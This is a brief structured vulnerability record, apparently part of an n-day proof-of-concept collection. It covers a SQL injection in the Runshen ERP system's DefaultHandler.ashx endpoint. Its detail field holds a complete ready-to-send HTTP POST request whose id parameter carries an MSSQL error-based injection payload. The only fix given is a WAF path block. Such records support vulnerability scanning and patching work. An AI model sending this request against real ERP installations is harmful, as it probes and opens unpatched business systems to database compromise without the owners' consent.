vendor = "润申"
name = "润申信息科技ERP系统DefaultHandler.ashx接口存在sql注入漏洞"
type = "SQL注入"
version = "未知"
path = "/ashx/DefaultHandler.ashx"
detail = "POST /ashx/DefaultHandler.ashx HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 Connection: close Content-Length: 115 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip action=GetDetail&status=300&id=1+and+%01(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123')),3,32))<0--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0813"
label = "nday"
